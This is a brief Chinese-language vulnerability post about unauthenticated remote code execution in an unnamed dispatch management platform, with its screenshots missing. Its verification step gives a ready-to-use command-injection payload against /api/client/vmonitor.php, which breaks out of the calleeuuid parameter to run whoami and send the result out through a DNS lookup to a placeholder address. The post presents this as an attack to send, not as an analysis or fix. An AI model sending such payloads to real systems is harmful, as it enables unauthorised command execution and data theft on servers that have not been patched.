某调度管理平台未授权rce

Rainy-Day / 2024-03-06 / 原文

漏洞说明:
image


image

漏洞验证:

/api/client/vmonitor.php?extension=1,1&calleeuuid=";{ping,`whoami`.dns地址,-c,4};"(

url编码发送
image